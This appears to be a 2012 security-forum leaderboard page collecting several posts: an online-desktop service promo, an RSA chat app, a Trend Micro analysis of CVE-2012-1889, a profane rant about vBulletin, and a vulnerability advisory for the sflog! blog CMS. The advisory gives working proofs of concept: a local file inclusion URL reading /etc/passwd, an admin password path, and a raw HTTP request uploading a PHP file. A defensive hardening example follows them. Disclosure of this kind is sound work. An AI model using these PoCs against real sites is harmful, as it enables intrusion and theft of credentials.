Leaderboard
Popular Content
Showing content with the highest reputation on 07/07/12 in all areas
-
What is PoS?

PoS is a web platform based on a desktop operating system, created specially for the RST (Romanian Security Team) community and inspired by an open-source project. In many ways it is a complete desktop operating system, with file and application management, running in a draggable environment with resizable windows.

Overview

As I said before, PoS offers a complete desktop with a suite of applications, in a system that can be accessed online through a web browser. It is a system that can provide a fleet of networked computers in the cloud, and it can also be a personal refuge when you are using someone else's computer. When investigating a system such as PoS, most people will ask about performance. As expected, application launch and execution speed are fast compared with the other cloud desktop operating systems. However, if you think about it, PoS offers a system that can be compared to an online PC, hence the name PoS (Personal Online System).

So, what are the advantages? Well, by default it offers a wide range of applications, including a calendar, an RSS reader, an e-mail client, a word processor, a spreadsheet, a contact manager, an FTP and SSH client, games, an anonymous browser, a music player, a video player, radio, a picture viewer, a picture editor, chat, a messenger, sharing between the platform's users, 20 GB of space for users and 50 GB for VIPs, and a management system with the facilities needed to upload and download files.

***WARNING*** No logs or IPs of any kind are kept, absolutely every session is anonymous, and all the files in your accounts are private and accessible only to you.

PoS site: www.p-o-s.org
Pictures:
Thanks to: ps-axl, DarkyAngel

3 points
-
Hi, I am presenting a small application I have been working on for a while. First of all, I want to thank Nytro and Python3 for answering a few of my questions.

Broadly, what does this program of mine do? It is a chat program. The connection is made directly IP to IP. You set which IP you want to connect to and which port the person you want to talk to is listening on, and you hit connect. As simple as that.

The twist? What is sent is encrypted with a public key. The algorithm used? RSA. Also, for the safety of the transmission, the message is also encoded with base64 after the encryption with the public key. The public key and the private key are generated when the application starts, and the public one is encrypted in base64 and sent to the person we are talking to when the connection to them is initialized.

A note, though, for those who use routers: you will get an error saying the port is already in use. I had no way to test this, but I tend to think that port forwarding has to be set up and everything should be OK. Otherwise you can modify the program so that it no longer starts the server and only use it to connect to other people.

I am attaching a project for Windows as well as one for Linux (tested on Debian); the Code::Blocks IDE was used on both systems. For the Windows version you will need to compile the wxWidgets library version 2.8.12 (static libraries, unicode, debug and release) and the crypto++ library, also as a static library, or you can directly use the executable in the release folder together with the DLL next to it. For Linux I used the wxWidgets 2.8.10 library from the Debian repository, and the crypto++ library from the same Debian 6 (squeeze) repository. Both the Linux project and the Windows one already have the release and debug versions compiled; however, on Linux you may not be able to run it if you do not have the wxWidgets and crypto++ libraries installed.

Link: Windows project (RO)
Link: Linux project (RO)
Link: English Windows project
Link: English Linux project

I hope you like it and find it useful. A warning, though: just like SSL, the application is vulnerable to a man-in-the-middle attack; still, for everyday security, as long as nobody is deliberately trying to see what you are talking about, you are safe. From what I have read, brute force against an RSA key is difficult to carry out, so it should be OK.

English short version: I present you a simple IP-to-IP chat application. It connects by giving the application the IP of the person you wish to talk to. Above you have the links for the English version of the application. The communication between the applications is done encrypted using a rather big RSA key. Be aware that the application is vulnerable to a man-in-the-middle attack. Also, if you have a router you will not be able to listen on any port without port forwarding. One way to work around this is to modify the project so that the mpSockServ is never initialized; this way you can only connect to other people, but you will be able to use the application behind a router. To successfully compile the application you will need the wxWidgets library version 2.8.12 or above compiled with unicode, as a static link library, both release and debug, and the crypto++ library also as a static link library. On Linux the libraries from the Debian squeeze repository were used.

LE: Fixed, I had come in through an online proxy and it modified the link. It should be OK now.
LE2: I also added the project for the English-language interface, both the Windows version and the Linux one.

1 point
-
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-07-05 ]
#################################################
# [ sflog! <= 1.00 ] Multiple Vulnerabilities   #
#################################################
#
# Script: "sflog! is a flat and light CMS::Blog system."
#
# Vendor: http://sourceforge.net/projects/sflog/
# Download: http://sourceforge.net/projects/sflog/files/sflog/
#
#
# [ LFI ]
#
# PoC: http://localhost/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd
#
# File: ./sflog/index.php (lines: 1, 53)
# ..cut..
# 1 <?php include("./includes/pageHeader.inc.php"); ?> // 1
# ..cut..
#
# 53 require_once("./includes/entries.inc.php"); // 4
# ..cut..
#
# File: ./sflog/includes/pageHeader.inc.php (lines: 20, 35)
# ..cut..
# 20 $_blogID = $_GET['blog']; // 2
# ..cut..
#
# 35 $_sectionID = $_GET['section']; // 3
# ..cut..
#
# File: ./sflog/includes/entries.inc.php (lines: 2-11)
# ..cut..
# 2 include_once("./cms/BlogEntry.class.php"); // 5
# 3 include_once("./cms/Blog.class.php");
# 4 $blog = new BlogEntry($_blogID,$_sectionID); // 6
# 5 $cms = new Blog();
# 6 $pages = $cms->getPostPerPage($_blogID);
# 7
# 8 // checks for permalink
# 9 if (isset($_GET['permalink'])){
# 10 $_permalink = $_GET['permalink']; // 8
# 11 $blog->showEntry($_permalink); // 9
# ..cut..
#
# File: ./sflog/cms/BlogEntry.class.php (lines: 37-85)
# ..cut..
# 37 class BlogEntry {
# ..cut..
# 47 function BlogEntry($blogID,$sectionID){ // 7
# 48 error_reporting(E_USER_ERROR); //
# 49 $this->blogID = $blogID; //
# 50 $this->sectionID = $sectionID; //
# 51 }
# ..cut..
# 57 function showEntry($entryID){ // 10
# ..cut..
# 60 $JournalContentDir = "./blogs/".$this->blogID."/data/".$this->sectionID; // 11
# ..cut..
# 80 $JournalContent = $JournalContentDir."/".$entryID; // 12
# ..cut..
# 83 include_once $JournalContent; // 13 [LFI]
# ..cut..
#
#################################################
# [ Admin Password Disclosure ]
#
# PoC: http://localhost/sflog/admin/passwd
#
#################################################
# [ Arbitrary File Upload ]
#
# File: ./sflog/admin/includes/uploadContent.inc.php (lines: 62-72)
# ..cut..
# 62 if (trim($_FILES['fileID']['name'])!=''){
# 63 $uploaddir = BLOG_PATH.$blogID.BLOG_UPLOADS;
# 64 $uploadfile = $uploaddir . basename($_FILES['fileID']['name']);
# 65 echo '<pre>';
# 66 if (move_uploaded_file($_FILES['fileID']['tmp_name'], $uploadfile)) {
# 67 print(UPLOAD_SUCCESS);
# 68 } else {
# 69 print('<font color="red">'.UPLOAD_FAILED.'</font>');
# 70 }
# 71 print "</pre>";
# 72 }
# ..cut..
#
# PoC:
#
# POST /sflog/admin/includes/uploadContent.inc.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: multipart/form-data; boundary=---------------------------4827543632391
# Content-Length: 411
# -----------------------------4827543632391
# Content-Disposition: form-data; name="blogID"
#
# admin
# -----------------------------4827543632391
# Content-Disposition: form-data; name="MAX_FILE_SIZE"
#
# 0
# -----------------------------4827543632391
# Content-Disposition: form-data; name="fileID"; filename="info.php"
# Content-Type: text/x-php
#
# <?php phpinfo(); ?>
#
# -----------------------------4827543632391--
#
#
# Uploaded file will be here: http://localhost/sflog/blogs/admin/uploads/info.php
#
### [ dun / 2012 ] #####################################################

Source

1 point
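A hardened counterpart to the path construction the advisory traces through BlogEntry::showEntry() (lines 60-83), added here as an example; it is not code from the advisory or from the sflog project. The function names, the identifier allowlist and the assumed "name.ext" entry form are illustrative assumptions.

```php
<?php
// Added example, not sflog code. isSafeId(), resolveEntryPath() and the
// allowlists below are hypothetical names and rules chosen for illustration.

// Accept only simple identifiers for blog and section names, so "../",
// "/" and NUL bytes never reach the path concatenation.
function isSafeId(string $id): bool {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id) === 1;
}

// Build the entry path from validated parts, then confirm that the
// resolved file is still inside the blogs directory before it is used.
function resolveEntryPath(string $blogsRoot, string $blogID,
                          string $sectionID, string $entryID): ?string {
    // Entry names may carry one extension (assumed form: "name.ext").
    $entryOk = preg_match('/\A[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?\z/',
                          $entryID) === 1;
    if (!isSafeId($blogID) || !isSafeId($sectionID) || !$entryOk) {
        return null;
    }
    $root = realpath($blogsRoot);
    $path = realpath("$blogsRoot/$blogID/data/$sectionID/$entryID");
    if ($root === false || $path === false) {
        return null;                       // missing root or missing entry
    }
    // realpath() resolves symlinks and ".."; require the result under $root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree in the temp directory (sample data, not sflog's).
$root = sys_get_temp_dir() . '/sflog_demo_' . getmypid();
mkdir("$root/admin/data/news", 0700, true);
file_put_contents("$root/admin/data/news/entry1.txt", "hello");

// The parameters from the advisory's PoC are rejected before any file access;
// a well-formed entry inside the tree resolves to its absolute path.
var_dump(resolveEntryPath($root, 'admin', '../../../../../../../etc/', 'passwd'));
var_dump(resolveEntryPath($root, 'admin', 'news', 'entry1.txt'));
```

If entry files hold content rather than code, outputting the resolved path with readfile() instead of include_once also removes the code-execution side of the issue.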
-
Last month, Microsoft released a fix tool in order to address a vulnerability in Microsoft XML Core Services. The said vulnerability, according to the Microsoft Security Advisory, could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. It has been given the identifier CVE-2012-1889.

Since the vulnerability exists in Microsoft XML Core Services by way of IE, which is installed on most PCs in the world, we assume that this attack code would have an extremely big impact on users once it is exploited by malicious users. Another factor that would contribute to its impact is the fact that its attack code was made public. In line with this, we'd like to share the results of our analysis of a malware which exploits CVE-2012-1889. Trend Micro products detect this particular malware as HTML_EXPLOYT.AE.

HTML_EXPLOYT.AE Overview

HTML_EXPLOYT.AE may arrive in a system through a variety of means, such as email or a malicious website. It attempts to exploit CVE-2012-1889 via Internet Explorer. It should be noted that this specific exploit does not have a function to bypass DEP (Data Execution Prevention). If HTML_EXPLOYT.AE runs on an Internet Explorer with DEP enabled, it causes IE to crash. However, considering that the attack code for this exploit has been released in the wild, it is possible that we will see a sample that can bypass DEP and ASLR.

HTML_EXPLOYT.AE has three main features, which we will discuss in a 3-part blog series. For part 1, we will discuss the usage of Microsoft XML Core Services.

HTML_EXPLOYT.AE Feature 1: Usage of Microsoft XML Core Services

HTML_EXPLOYT.AE uses an object element with a Classid to exploit Microsoft XML Core Services. Specifically, HTML_EXPLOYT.AE exploits CVE-2012-1889 by referring to an uninitialized object. In order to confirm the root cause of the CVE-2012-1889 vulnerability, it is better to check how this code is used normally.

So here we have the code to exploit CVE-2012-1889, with the heap spray codes deleted:

Now let's check the vulnerable code above when executed normally:

The upper [eax] points to an object by a virtual function of "msxml3!Document::`vftable'" and [ecx+18h] points to the "msxml3!Document::weakRelease" function. Its vftable is the following:

From this we can see that the exploit HTML_EXPLOYT.AE takes advantage of the Microsoft XML Core Service (mxml3.dll) vulnerability. Internet Explorer Microsoft XML Core Service (mxml3.dll) uses this module in order to process HTML/XML codes, making this program and other applications that use this module vulnerable to this attack. Based on this, we can conclude that it is possible for attackers to use other vectors in order to exploit the Microsoft XML Core Service vulnerability.

Trend Micro protects users from this threat via Smart Protection Network™, which detects and deletes HTML_EXPLOYT.AE. Furthermore, Deep Security prevents attacks exploiting CVE-2012-1889 via IDF rule 1005061 - Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889).

In the second installment of our 3-part series about this exploit, we will share our findings regarding the second feature of HTML_EXPLOYT.AE: Heap Spray.

Source: http://blog.trendmicro.com/technical-analysis-of-cve-2012-1889-exploit-html_exployt-ae-part-1/

1 point
-
I upgraded to the latest version of vBulletin and most of the forum got fucked up. Basically those cocksuckers had made some limp piece of crap called "Activity stream", which is shit like the one on Facebook. The problem is that only a single post showed up here, a test one I made after the installation; you could NOT see the categories, nothing. I have left the old functionality in place until I talk to those begging cocksuckers at vBulletin.

Problems:
- ckeditor does not load, so posted text will not be formatted, and line breaks (Enter) will not be kept either
- another template cannot be selected
- probably others

I have left it like this for now so that it is still functional. I will try to fix the problems.

FUCK vBulletin, do not use this crap, not even nulled, and under no circumstances pay a single cent for it. If someone from vBulletin staff reads this: FUCK YOU.

Post any other problems here. I apologize for the inconvenience, and fuck vBulletin.

// Nytro

-1 points